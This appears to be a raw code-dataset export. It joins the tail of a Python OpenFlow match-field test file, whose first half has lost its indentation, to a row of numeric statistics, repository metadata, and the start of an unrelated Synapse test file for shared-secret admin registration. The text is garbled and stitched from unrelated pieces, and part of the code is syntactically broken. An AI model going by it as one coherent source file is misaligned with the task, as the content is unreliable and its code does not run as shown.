arp_sha_bin = self.haddr_to_bin(arp_sha)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
arp_sha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha(arp_sha_bin)
self.add_matches(dp, match)
def test_rule_set_arp_sha_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
arp_sha_bin = self.haddr_to_bin(arp_sha)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
arp_sha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha_masked(arp_sha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_sha_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
arp_sha_bin = self.haddr_to_bin(arp_sha)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
arp_sha_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha_masked(arp_sha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_sha_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
arp_sha_bin = self.haddr_to_bin(arp_sha)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha_masked(arp_sha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
arp_tha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha(arp_tha_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
arp_tha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha_masked(arp_tha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
arp_tha_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha_masked(arp_tha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha_masked(arp_tha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_ipv6_src(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
ipv6_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src(ipv6_src_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_src_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
ipv6_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src_masked(ipv6_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_src_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:0'
mask_int = self.ipv6_to_int(mask)
ipv6_src_masked = [x & y for (x, y) in
itertools.izip(ipv6_src_int, mask_int)]
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
ipv6_src_masked, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src_masked(ipv6_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_src_masked_00(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
mask = '0:0:0:0:0:0:0:0'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src_masked(ipv6_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
dp.ofproto.OXM_OF_IPV6_DST_W, ),
ipv6_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_dst(ipv6_dst_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
dp.ofproto.OXM_OF_IPV6_DST_W, ),
ipv6_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_dst_masked(ipv6_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst_masked_f0(self, dp):
    """Match the IPv6 destination under a partial mask (last 16-bit group
    wildcarded).

    With a partial mask, both the masked address and the mask itself are
    expected back via the wildcard OXM field (OXM_OF_IPV6_DST_W).
    """
    dl_type = ether.ETH_TYPE_IPV6
    ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
    ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
    mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:0'
    mask_int = self.ipv6_to_int(mask)
    # zip() instead of the Python-2-only itertools.izip(): identical
    # behaviour for this comprehension and keeps the file Py3-compatible.
    ipv6_dst_masked = [x & y for (x, y) in
                       zip(ipv6_dst_int, mask_int)]
    self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
                     dp.ofproto.OXM_OF_IPV6_DST_W, ),
                    ipv6_dst_masked, mask_int]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(dl_type)
    match.set_ipv6_dst_masked(ipv6_dst_int, mask_int)
    self.add_matches(dp, match)
def test_rule_set_ipv6_dst_masked_00(self, dp):
    """An all-zero mask wildcards the IPv6 destination field completely."""
    dst_int = self.ipv6_to_int('e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038')
    zero_mask_int = self.ipv6_to_int('0:0:0:0:0:0:0:0')
    # A fully wildcarded field is expected to be omitted (None, None).
    self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
                     dp.ofproto.OXM_OF_IPV6_DST_W, ),
                    None, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ipv6_dst_masked(dst_int, zero_mask_int)
    self.add_matches(dp, match)
def test_rule_set_ipv6_flabel(self, dp):
    """Match on an exact IPv6 flow label."""
    flabel = 0xc5384
    self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
                     dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
                    flabel, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ipv6_flabel(flabel)
    self.add_matches(dp, match)
def test_rule_set_ipv6_flabel_masked_ff(self, dp):
    """A full flow-label mask degenerates to an exact match (mask dropped)."""
    flabel = 0xc5384
    full_mask = 0xfffff
    self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
                     dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
                    flabel, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ipv6_flabel_masked(flabel, full_mask)
    self.add_matches(dp, match)
def test_rule_set_ipv6_flabel_masked_f0(self, dp):
    """A partial flow-label mask keeps both the masked value and the mask."""
    flabel = 0xc5384
    partial_mask = 0xffff0
    self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
                     dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
                    flabel & partial_mask, partial_mask]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ipv6_flabel_masked(flabel, partial_mask)
    self.add_matches(dp, match)
def test_rule_set_ipv6_flabel_masked_00(self, dp):
    """A zero flow-label mask wildcards the field completely."""
    flabel = 0xc5384
    zero_mask = 0x0
    # A fully wildcarded field is expected to be omitted (None, None).
    self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
                     dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
                    None, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ipv6_flabel_masked(flabel, zero_mask)
    self.add_matches(dp, match)
def test_rule_set_icmpv6_type(self, dp):
    """Match on the ICMPv6 type field."""
    icmp_type = 129
    self._verify = [(dp.ofproto.OXM_OF_ICMPV6_TYPE, ),
                    icmp_type, None]

    match = dp.ofproto_parser.OFPMatch()
    # Set the eth-type and ip-proto prerequisites before the ICMPv6 field.
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ip_proto(inet.IPPROTO_ICMPV6)
    match.set_icmpv6_type(icmp_type)
    self.add_matches(dp, match)
def test_rule_set_icmpv6_code(self, dp):
    """Match on the ICMPv6 code; the type prerequisite is set first."""
    icmp_type = 138
    icmp_code = 1
    self._verify = [(dp.ofproto.OXM_OF_ICMPV6_CODE, ),
                    icmp_code, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ip_proto(inet.IPPROTO_ICMPV6)
    match.set_icmpv6_type(icmp_type)
    match.set_icmpv6_code(icmp_code)
    self.add_matches(dp, match)
def test_rule_set_ipv6_nd_target(self, dp):
    """Match on the IPv6 neighbour-discovery target address."""
    target_int = self.ipv6_to_int("5420:db3f:921b:3e33:2791:98f:dd7f:2e19")
    self._verify = [(dp.ofproto.OXM_OF_IPV6_ND_TARGET, ),
                    target_int, None]

    match = dp.ofproto_parser.OFPMatch()
    # Prerequisites: IPv6 eth-type, ICMPv6 ip-proto, ICMPv6 type 135.
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ip_proto(inet.IPPROTO_ICMPV6)
    match.set_icmpv6_type(135)
    match.set_ipv6_nd_target(target_int)
    self.add_matches(dp, match)
def test_rule_set_ipv6_nd_sll(self, dp):
    """Match on the ND source link-layer address."""
    sll_bin = self.haddr_to_bin("93:6d:d0:d4:e8:36")
    self._verify = [(dp.ofproto.OXM_OF_IPV6_ND_SLL, ),
                    sll_bin, None]

    match = dp.ofproto_parser.OFPMatch()
    # Prerequisites: IPv6 eth-type, ICMPv6 ip-proto, ICMPv6 type 135.
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ip_proto(inet.IPPROTO_ICMPV6)
    match.set_icmpv6_type(135)
    match.set_ipv6_nd_sll(sll_bin)
    self.add_matches(dp, match)
def test_rule_set_ipv6_nd_tll(self, dp):
    """Match on the ND target link-layer address."""
    tll_bin = self.haddr_to_bin("18:f6:66:b6:f1:b3")
    self._verify = [(dp.ofproto.OXM_OF_IPV6_ND_TLL, ),
                    tll_bin, None]

    match = dp.ofproto_parser.OFPMatch()
    # Prerequisites: IPv6 eth-type, ICMPv6 ip-proto, ICMPv6 type 136.
    match.set_dl_type(ether.ETH_TYPE_IPV6)
    match.set_ip_proto(inet.IPPROTO_ICMPV6)
    match.set_icmpv6_type(136)
    match.set_ipv6_nd_tll(tll_bin)
    self.add_matches(dp, match)
def test_rule_set_mpls_label(self, dp):
    """Match on an MPLS label.

    Uses the symbolic ``ether.ETH_TYPE_MPLS`` constant (value 0x8847)
    instead of a bare magic number, for consistency with the other tests
    in this class that use ``ether.ETH_TYPE_*`` constants.
    """
    dl_type = ether.ETH_TYPE_MPLS
    label = 2144
    self._verify = [(dp.ofproto.OXM_OF_MPLS_LABEL, ),
                    label, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(dl_type)
    match.set_mpls_label(label)
    self.add_matches(dp, match)
def test_rule_set_mpls_tc(self, dp):
    """Match on the MPLS traffic-class bits.

    Uses the symbolic ``ether.ETH_TYPE_MPLS`` constant (value 0x8847)
    instead of a bare magic number, for consistency with the other tests
    in this class that use ``ether.ETH_TYPE_*`` constants.
    """
    dl_type = ether.ETH_TYPE_MPLS
    tc = 3
    self._verify = [(dp.ofproto.OXM_OF_MPLS_TC, ),
                    tc, None]

    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_type(dl_type)
    match.set_mpls_tc(tc)
    self.add_matches(dp, match)
| 35.776664 | 69 | 0.602619 | 5,795 | 39,247 | 3.674029 | 0.050043 | 0.087502 | 0.071016 | 0.082852 | 0.914377 | 0.907754 | 0.899253 | 0.879574 | 0.871354 | 0.867878 | 0 | 0.040049 | 0.299539 | 39,247 | 1,096 | 70 | 35.809307 | 0.734422 | 0.016969 | 0 | 0.757206 | 0 | 0 | 0.038693 | 0.012448 | 0 | 0 | 0.003034 | 0 | 0 | 1 | 0.0898 | false | 0 | 0.006652 | 0 | 0.103104 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
54d46f4bd3dbfc8779a65fe82e1086dee110a8c9 | 69,968 | py | Python | tests/rest/admin/test_user.py | sandhose/synapse | 3e8292d48324d329c188d0125cdec4020ddc39ff | [
"Apache-2.0"
] | 1 | 2021-12-31T23:33:48.000Z | 2021-12-31T23:33:48.000Z | tests/rest/admin/test_user.py | sandhose/synapse | 3e8292d48324d329c188d0125cdec4020ddc39ff | [
"Apache-2.0"
] | null | null | null | tests/rest/admin/test_user.py | sandhose/synapse | 3e8292d48324d329c188d0125cdec4020ddc39ff | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import hmac
import json
import urllib.parse
from binascii import unhexlify
from mock import Mock
import synapse.rest.admin
from synapse.api.constants import UserTypes
from synapse.api.errors import Codes, HttpResponseException, ResourceLimitError
from synapse.rest.client.v1 import login, logout, profile, room
from synapse.rest.client.v2_alpha import devices, sync
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import override_config
class UserRegisterTestCase(unittest.HomeserverTestCase):
    """Tests for the shared-secret registration endpoint
    (``/_synapse/admin/v1/register``)."""

    servlets = [
        synapse.rest.admin.register_servlets_for_client_rest_resource,
        profile.register_servlets,
    ]

    def make_homeserver(self, reactor, clock):
        """Build a homeserver with a known shared secret and mocked-out
        handlers, so only the registration servlet logic is exercised."""

        self.url = "/_synapse/admin/v1/register"

        self.registration_handler = Mock()
        self.identity_handler = Mock()
        self.login_handler = Mock()
        self.device_handler = Mock()
        self.device_handler.check_device_registered = Mock(return_value="FAKE")

        self.datastore = Mock(return_value=Mock())
        self.datastore.get_current_state_deltas = Mock(return_value=(0, []))

        self.secrets = Mock()

        self.hs = self.setup_test_homeserver()

        # The secret used to compute the registration HMACs below.
        self.hs.config.registration_shared_secret = "shared"

        self.hs.get_media_repository = Mock()
        self.hs.get_deactivate_account_handler = Mock()

        return self.hs

    def test_disabled(self):
        """
        If there is no shared secret, registration through this method will be
        prevented.
        """
        self.hs.config.registration_shared_secret = None

        request, channel = self.make_request("POST", self.url, b"{}")

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual(
            "Shared secret registration is not enabled", channel.json_body["error"]
        )

    def test_get_nonce(self):
        """
        Calling GET on the endpoint will return a randomised nonce, using the
        homeserver's secrets provider.
        """
        secrets = Mock()
        secrets.token_hex = Mock(return_value="abcd")

        self.hs.get_secrets = Mock(return_value=secrets)

        request, channel = self.make_request("GET", self.url)

        self.assertEqual(channel.json_body, {"nonce": "abcd"})

    def test_expired_nonce(self):
        """
        Calling GET on the endpoint will return a randomised nonce, which will
        only last for SALT_TIMEOUT (60s).
        """
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        # 59 seconds
        self.reactor.advance(59)

        body = json.dumps({"nonce": nonce})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        # Nonce still valid: the request fails on the *next* check instead.
        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("username must be specified", channel.json_body["error"])

        # 61 seconds
        self.reactor.advance(2)

        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        # Nonce has now expired.
        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("unrecognised nonce", channel.json_body["error"])

    def test_register_incorrect_nonce(self):
        """
        Only the provided nonce can be used, as it's checked in the MAC.
        """
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        # Compute the MAC over the *wrong* nonce.
        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(b"notthenonce\x00bob\x00abc123\x00admin")
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob",
                "password": "abc123",
                "admin": True,
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("HMAC incorrect", channel.json_body["error"])

    def test_register_correct_nonce(self):
        """
        When the correct nonce is provided, and the right key is provided, the
        user is registered.
        """
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        # MAC over nonce\0username\0password\0admin-flag\0user-type.
        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(
            nonce.encode("ascii") + b"\x00bob\x00abc123\x00admin\x00support"
        )
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob",
                "password": "abc123",
                "admin": True,
                "user_type": UserTypes.SUPPORT,
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("@bob:test", channel.json_body["user_id"])

    def test_nonce_reuse(self):
        """
        A valid nonce can only be used once; replaying it is rejected.
        """
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(nonce.encode("ascii") + b"\x00bob\x00abc123\x00admin")
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob",
                "password": "abc123",
                "admin": True,
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("@bob:test", channel.json_body["user_id"])

        # Now, try and reuse it
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("unrecognised nonce", channel.json_body["error"])

    def test_missing_parts(self):
        """
        Synapse will complain if you don't give nonce, username, password, and
        mac. Admin and user_types are optional. Additional checks are done for length
        and type.
        """

        def nonce():
            # Fetch a fresh nonce for each sub-request.
            request, channel = self.make_request("GET", self.url)
            return channel.json_body["nonce"]

        #
        # Nonce check
        #

        # Must be present
        body = json.dumps({})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("nonce must be specified", channel.json_body["error"])

        #
        # Username checks
        #

        # Must be present
        body = json.dumps({"nonce": nonce()})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("username must be specified", channel.json_body["error"])

        # Must be a string
        body = json.dumps({"nonce": nonce(), "username": 1234})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid username", channel.json_body["error"])

        # Must not have null bytes
        body = json.dumps({"nonce": nonce(), "username": "abcd\u0000"})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid username", channel.json_body["error"])

        # Must not be too long
        body = json.dumps({"nonce": nonce(), "username": "a" * 1000})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid username", channel.json_body["error"])

        #
        # Password checks
        #

        # Must be present
        body = json.dumps({"nonce": nonce(), "username": "a"})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("password must be specified", channel.json_body["error"])

        # Must be a string
        body = json.dumps({"nonce": nonce(), "username": "a", "password": 1234})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid password", channel.json_body["error"])

        # Must not have null bytes
        body = json.dumps({"nonce": nonce(), "username": "a", "password": "abcd\u0000"})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid password", channel.json_body["error"])

        # Super long
        body = json.dumps({"nonce": nonce(), "username": "a", "password": "A" * 1000})
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid password", channel.json_body["error"])

        #
        # user_type check
        #

        # Invalid user_type
        body = json.dumps(
            {
                "nonce": nonce(),
                "username": "a",
                "password": "1234",
                "user_type": "invalid",
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Invalid user type", channel.json_body["error"])

    def test_displayname(self):
        """
        Test that displayname of new user is set
        """

        # set no displayname
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(nonce.encode("ascii") + b"\x00bob1\x00abc123\x00notadmin")
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {"nonce": nonce, "username": "bob1", "password": "abc123", "mac": want_mac}
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("@bob1:test", channel.json_body["user_id"])

        # Omitted displayname: defaults to the localpart.
        request, channel = self.make_request("GET", "/profile/@bob1:test/displayname")
        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("bob1", channel.json_body["displayname"])

        # displayname is None
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(nonce.encode("ascii") + b"\x00bob2\x00abc123\x00notadmin")
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob2",
                "displayname": None,
                "password": "abc123",
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("@bob2:test", channel.json_body["user_id"])

        # None is treated like an omitted displayname: localpart default.
        request, channel = self.make_request("GET", "/profile/@bob2:test/displayname")
        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("bob2", channel.json_body["displayname"])

        # displayname is empty
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(nonce.encode("ascii") + b"\x00bob3\x00abc123\x00notadmin")
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob3",
                "displayname": "",
                "password": "abc123",
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("@bob3:test", channel.json_body["user_id"])

        # An empty displayname means no profile entry is created at all.
        request, channel = self.make_request("GET", "/profile/@bob3:test/displayname")
        self.assertEqual(404, int(channel.result["code"]), msg=channel.result["body"])

        # set displayname
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(nonce.encode("ascii") + b"\x00bob4\x00abc123\x00notadmin")
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob4",
                "displayname": "Bob's Name",
                "password": "abc123",
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("@bob4:test", channel.json_body["user_id"])

        request, channel = self.make_request("GET", "/profile/@bob4:test/displayname")
        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("Bob's Name", channel.json_body["displayname"])

    @override_config(
        {"limit_usage_by_mau": True, "max_mau_value": 2, "mau_trial_days": 0}
    )
    def test_register_mau_limit_reached(self):
        """
        Check we can register a user via the shared secret registration API
        even if the MAU limit is reached.
        """
        handler = self.hs.get_registration_handler()
        store = self.hs.get_datastore()

        # Set monthly active users to the limit
        store.get_monthly_active_count = Mock(
            return_value=make_awaitable(self.hs.config.max_mau_value)
        )
        # Check that the blocking of monthly active users is working as expected
        # The registration of a new user fails due to the limit
        self.get_failure(
            handler.register_user(localpart="local_part"), ResourceLimitError
        )

        # Register new user with admin API
        request, channel = self.make_request("GET", self.url)
        nonce = channel.json_body["nonce"]

        want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
        want_mac.update(
            nonce.encode("ascii") + b"\x00bob\x00abc123\x00admin\x00support"
        )
        want_mac = want_mac.hexdigest()

        body = json.dumps(
            {
                "nonce": nonce,
                "username": "bob",
                "password": "abc123",
                "admin": True,
                "user_type": UserTypes.SUPPORT,
                "mac": want_mac,
            }
        )
        request, channel = self.make_request("POST", self.url, body.encode("utf8"))

        # Shared-secret registration bypasses the MAU limit.
        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
